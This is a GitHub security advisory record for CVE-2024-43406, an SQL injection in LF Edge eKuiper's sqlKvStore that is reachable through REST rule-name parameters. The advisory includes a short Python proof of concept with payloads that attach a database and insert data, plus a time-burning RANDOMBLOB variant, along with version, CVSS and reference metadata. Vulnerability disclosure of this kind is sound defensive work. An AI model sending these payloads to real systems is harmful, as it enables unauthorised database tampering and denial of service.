ghsa-r5ph-4jxm-6j9p
Vulnerability from github
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
``` import requests from urllib.parse import quote
SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler
res = requests.get(url) print(res.content) ```
The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lf-edge/ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43406"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-20T20:04:31Z",
"nvd_published_at": "2024-08-20T15:15:24Z",
"severity": "HIGH"
},
"details": "### Summary\nA user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. \n\n### Details\nI will use explainRuleHandler (\"/rules/{name}/explain\") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.\n\nThe SQL injection can happen in the code:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93\nThe code to accept user input is:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277\n\nThe rule id in the above code can be used to exploit SQL query.\n\nNote that the delete function is also vulnerable:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141\n\n### PoC\n```\nimport requests\nfrom urllib.parse import quote\n\n# SELECT val FROM \u0027xxx\u0027 WHERE key=\u0027%s\u0027;\npayload = f\"\"\"\u0027; ATTACH DATABASE \u0027test93\u0027 AS test93;\nCREATE TABLE test93.pwn (dataz text);\nINSERT INTO test93.pwn (dataz) VALUES (\"sql injection\");--\"\"\"\n\n#payload = \"deadbeef\u0027; SELECT 123=LIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(100000000))));--\"\n\nurl = f\"http://127.0.0.1:9081/rules/{quote(payload,safe=\u0027\u0027)}/explain\" # explainRuleHandler\n\nres = requests.get(url)\nprint(res.content)\n```\n\nThe screenshot shows the malicious SQL query to insert a value:\n\n\nThe screenshot shows the breakpoint of executing the query:\n\n\n\n\n\n### Impact\nSQL Injection vulnerability\n\nThe reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.\n",
"id": "GHSA-r5ph-4jxm-6j9p",
"modified": "2024-08-27T14:27:18Z",
"published": "2024-08-20T20:04:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43406"
},
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
},
{
"type": "PACKAGE",
"url": "https://github.com/lf-edge/ekuiper"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.